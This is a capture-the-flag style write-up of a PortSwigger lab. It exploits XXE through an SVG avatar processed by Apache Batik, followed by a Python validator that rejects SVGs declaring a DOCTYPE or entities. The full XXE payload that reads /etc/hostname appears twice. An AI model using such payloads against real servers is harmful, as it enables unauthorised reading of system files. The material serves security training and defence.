# Lab: Exploiting XXE via image file upload
###### tags: `Portswigger Web Security Academy` `Web`
* Description: This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
* Goal: To solve the lab, upload an image that displays the contents of the `/etc/hostname` file after processing. Then use the "Submit solution" button to submit the value of the server hostname.
## Recon
In this lab, we can upload a crafted `.svg` avatar containing malicious XML. Because the server processes the image with Apache Batik, which parses it as XML, an external entity declared in the file lets us read a local file and render its contents into the avatar.
## Exploit - Upload a Crafted SVG as Avatar
1. Create the exploit file
Create a text file containing the payload below.
The XXE payload for the `.svg` file:
```xml
<?xml version="1.0" standalone="yes"?>
<!-- Declare an external entity that resolves to the target file on the server -->
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <!-- The entity expands inside the text element, so the file contents are rendered into the image -->
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
```
2. Save it as an `.svg` file and upload it
After saving the payload as an `.svg` file, open any post and leave a comment below it, attaching the file as your avatar.

3. Check your avatar
Go back to the post page: the rendered avatar should now display a string, the server hostname read from `/etc/hostname`, which is the value you submit as the solution.
:::spoiler Success Screenshot

:::
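The server-side check that would have stopped this upload path, added here as an example (it is not part of the lab or of this writeup): before an SVG avatar ever reaches an XML-aware renderer such as Batik, parse it with the standard-library expat parser and reject any document that carries a DOCTYPE or an entity declaration. The two sample documents are constructed for the example; the malicious one has the same shape as the payload above.

```python
"""Reject SVG uploads that declare a DOCTYPE or entities (XXE guard)."""
import xml.parsers.expat

# Constructed sample in the shape of the lab's payload.
MALICIOUS_SVG = (
    '<?xml version="1.0" standalone="yes"?>'
    '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>'
    '<svg xmlns="http://www.w3.org/2000/svg" width="128px" height="128px">'
    '<text font-size="16" x="0" y="16">&xxe;</text></svg>'
)
# Constructed benign avatar: no DOCTYPE, no entities.
BENIGN_SVG = (
    '<?xml version="1.0"?>'
    '<svg xmlns="http://www.w3.org/2000/svg" width="128px" height="128px">'
    '<circle cx="64" cy="64" r="40"/></svg>'
)


def check_svg_upload(data) -> list:
    """Return a list of findings for an uploaded SVG (str or bytes).

    An empty list means the document is well-formed XML and contains no
    DOCTYPE and no entity declaration, internal or external."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()
    # Never resolve parameter entities / external DTD subsets while checking.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE declaration ({name})")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "external" if sysid else "internal"
        findings.append(f"{kind} entity declaration ({name})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        findings.append(f"not well-formed XML: {exc}")
    return findings


def is_safe_svg(data) -> bool:
    """True only when check_svg_upload reports nothing."""
    return not check_svg_upload(data)
```

Anything that fails `is_safe_svg` should be dropped before rasterisation; a legitimate avatar never needs a DOCTYPE.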